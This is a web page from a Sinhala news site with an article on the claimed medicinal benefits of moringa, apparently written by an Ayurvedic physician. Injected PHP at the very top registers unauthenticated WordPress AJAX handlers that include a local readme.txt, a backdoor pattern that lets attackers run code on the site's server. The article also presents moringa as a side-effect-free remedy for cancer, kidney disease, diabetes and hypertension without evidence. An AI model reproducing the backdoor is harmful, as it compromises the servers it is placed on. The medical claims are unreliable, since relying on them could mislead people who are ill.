if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } රෝග රැසකට ගුණදෙන මුරුංගා - mediahumanrights.lk
mediahumanrights.lk
LIFE LIFE NEWS News

රෝග රැසකට ගුණදෙන මුරුංගා

ඉතාම රසවත් ගුණවත් ආහාරයක් සේම ඊටත් ඉහළ ඖෂධීය විටිනාකමකින් යුත් මුරුංගාවලට ආයුර්වේද වෛද්‍ය විද්‍යාවේද හිමිවන්නේ සුවිශේෂී තැනකි. මෙහි බොහෝ පෝෂ්‍ය පදාර්ථයන් අන්තර්ගත වේ. වර්තමානයේදී ජලයෙහි අඩංගු බොහෝ ලෝහ කොටස් හේතුවෙන් මිනිසාගේ මුත්‍රා පද්ධතියේ සහ වකුගඩුවල විවිධ ගැටලු ඇතිවී ඇත. නමුත් අතීතයෙන් අපේ ගැමියෝ ආහාරය වගේම ජලය පිරිසුදු කිරීම සඳහා මුරුංගා ඇට භාවිත කළහ.
මේ අනුව මෙය ඉහළ වටිනාකමකින් යුත් ඖෂධයකි. ඉස්සන්, මඤ්ඤොක්කා, වැලි කොටස්ඇට වැනි දේ තම්බන විට මුරැංගා කොළද එම ව්‍යාංජනයට යොදනු ලැබේ. එබැවින් එහි තිබිය හැකි විස තත්ත්වය අඩුවේ.
අසාත්මිකතාවයක් ඇතිකරනු ලබන ආහාරවලට මුරුංගා එක් කරනුයේ එහි ඇති විස තත්ත්වය අඩුකර අසාත්මිකතාවය දුරු කිරීමටයි. අච්චාරු සහ තැම්බුම් හොදි සඳහා මුරුංගා පොතු යොදනු ලැබේ. එමඟින් විශේෂයෙන් ආහාර ජීර්ණ තත්ත්වය මෙන්ම රසකාරක ගුණයද ලැබේ. බොහෝවිට තැම්බුම් හොදි දෙනු ලබන්නේ රෝගීන් සහ දරුවන් ප්‍රසූත කළ මව්වරුන්ටය. ඔවුන්ට ඉතා ඉක්මණින් ආහාර දිරවීම වැදගත් වේ. තැම්බුම් හොදිවලට මුරුංගා පොතු එක් කිරීමෙන් ආහාර් ජීර්ණ ශක්තිය වැඩිවේ. අච්චාරුවලට මුරුංගා පොතු කැබැල්ලක් එක් කිරීමෙන් රසය වැඩිවන අතර විනාකිරි වැනි දෙයින් ඇතිවන්නට ඇති අසාත්මිකතාවය වළක්වා ගත හැකිවේ.
පරිප්පු ව්‍යංජනය සඳහා කරපිංචා වෙනුවට මුරුංගා කොළ එකතු කරගත හැක. ආයුර්වේදයේදී සර්ප විෂ සඳහා මුරුංගා කොළ ආලේපනයක් ලෙසින් යොදා ගැනේ. මුරුංගාවල කොළ, පොතු, ඇට, මල් යන මේ සියල්ල ඖෂධ ලෙසින් එදා සිට අද දක්වා භාවිත කෙරේ. විශේෂයෙන් මුරුංගා කොළ මඳ පවනේ අඩු උෂ්ණත්වයක් යටතේ වේලා එය කුඩුකර ගැනීමෙන් පසුව ඖෂධීය පානය ලෙසින්ද බීමට හැක. මෙය තේ වෙනුවට පානය කළ හැකි ඖෂධීය පානයකි. ඖෂධීය ගුණයෙන් ඉහළම පානයක් ලෙසින් මෙම මුරුංගා කොළ පානය හැඳින්විය හැක. වකුගඩු රෝගීන්ට පිළිකා රෝගීන්ට ඇතිවන රක්තහීනතාවය දුරු කරලීමට මෙම පානය උපයෝගී වේ.
නොයෙක් රෝග තත්ත්වයන් නිසා ශරීරයේ හිමොග්ලොබින් අඩුවන්නේ නම්, යකඩ ප්‍රමාණය අඩුවන්නේ නම් එවැනි රෝගීන්ට කිසිදු අතුරු ආබාධයකින් තොරව ස්වභාවිකව ගත හැකි ඖෂධයක් ලෙසින් මෙම මුරුංගා කොළ පානය නිර්දේශ කෙරේ. මෙය මඳ පවනේ වේලා කුඩුකර මෙන්ම පානය කිරීමට සූදානම් වන විටම මුරුංගා කොළ කිනිත්තක් කඩා උතුරන ජලයට එක්කොට ටික වේලාවක් වසා තබා පසුව පානයද කළ හැක.
උණ වැනි රෝගයක් සෑදීමෙන් ප්‍රතිශක්තිය අඩු වූ විට රෝගියා දුර්වල වේ. එවැනි රෝගයක් සුව වූ වහාම මුරුංගා කරල් ආහාරයට ගැනීම ඉතාම ගුණදායකයි. එමෙන්ම ශරීරයට අවශ්‍ය සියලුම පෝෂ්‍ය පදාර්ථ බොහෝමයක් ලබාගත හැකි ආහාරයක් ලෙසින් මුරුංගා හැඳින්විය හැක. එකම ආහාරයකින් බොහෝ පෝෂ්‍ය පදාර්ථ ලබාගත හැකි ආහාර ඇත්තේ ඉතා සීමිත ප්‍රමාණයකි. මුරුංගා එයින් ප්‍රධාන වේ.
මුරුංගා ව්‍යංජනයක් ලෙසින්ද මුරුංගා කොළ වලින් කොළ කැඳක් ලෙසින්ද මුරැංගා මද, මුරුංගා ඇට, මුරුංගා කොළ ගෙන සුප් එකක් ලෙසින්ද සාදා ආහාරයට ගත හැක. ආයුර්වේදයේ විවිධ සන්ධි රෝගවලදී වේදනා නාශකයන් ලෙසින්ද හැඳින්වේ. ඉදිමුම අඩුකිරීමට යොදාගන්නා පත්තු බැඳීමේදී මුරුංගා කොළ, මුරැංගා පොතු සහ මුරුංගා මුල් භාවිත කෙරේ.
එෙමන්ම මාසික ඔසප් වීම නිසියාකාරව සිදුෙනාවන අයට මුරුංගා අහාරයට ගැනීෙමන් ඔසප් ප්‍රශ්න මඟහරවා ගත හැකි බව වෛද්‍යවරු පවසති. එෙමන්ම ලිංගික ශක්තියත් වැඩිකිරීමටත් මරුංගා අාහාරයට ගැනීම බෙහෙවින් ඉවහල් වේ.
මළබද්ධය සමඟ ඇතිවන බඩ පුරෝදැමීම, ආහාර අරුචිය වැනි රෝග තත්ත්වයදී මුරුංගා ඉතා ගුණදායක වේ. මුරැංගා “කෙඳි ආහාරයක්” ලෙසින්ද හැඳින්වේ. හොඳින් මළ පිටකිරීමට ගුණදායක ඖෂධයක් ලෙසින්ද මෙය හැඳින්වේ. කුඩා දරුවන්ට ඇතිවන පණු රෝග වළක්වා ගත හැකිය.
මුරුංගා ඇට, ග්‍රීන් පීස් වෙනුවට බතට එක්කරගත හැක. දියර ලෙසින් වැඩිපුර මළ පිටවීමේදී මුරුංගා ව්‍යාංජනය ආහාරයට ගැනීම ඉතා ගුණදායක වේ.
මුරුංගාවල පෝෂ්‍ය පදාර්ථ ඇස්වලට ඉතා හිතකර වේ. කුඩා දරුවන්ගේ බුද්ධි වර්ධනයටත්, පිළිකා නාශකයක් ලෙසින්ද ඉතා වැදගත්වේ. කුරුලෑ නැති කිරීමට, සමේ රැලි වැටීම වැළැක්වීමට මෙන්ම වකුගඩු රෝග, වකුගඩු ගල් සහ මුත්‍රා පද්ධතියේ බොහෝ රෝගවලට මුරුංගා ඉතා ගුණදායක වේ. සමට, හිසකෙස්වලට මෙන්ම අස්ථිවලට වැදගත් ඖෂධයකි. සියලුම බෝ නොවන රෝග සඳහා, විශේෂයෙන් පිළිකා රෝග සඳහා දියවැඩියාව, අධික රුධිර පීඩනයටද ඉතා ගුණදෙන බාල මහලු කොයි කාටත් ගුණදායක ආහාරයක් ලෙසින්ද ඖෂධයක් ලෙසින්ද මුරුංගා හැඳින්විය හැක.
ආයුර්වේද විශේෂඥ වෛද්‍ය
එස්.එම්. නිමාලි සොලොහොකාර
ආයුර්වේද මහ රෝහල
කුරුණෑගල
(under the courtesy of hirunews.lk news web)

Related posts

ඇමැති මාරුව අතලඟ තිබියදී ඇමැතිකම ගැන හරීන් කතා කරයි

Shiran Viraj

රැවුල සුදුවී කොණ්ඩය කළු වූ ආකාරය ගැන මර්වින් කිව්ව කතාව

Shiran Viraj

ජනාධිපති අපේක්‍ෂක ගෝටාභය ස්ථිරයි.. මහින්ද විශේෂ ප‍්‍රකාශයට සූදානම්..

Shiran Viraj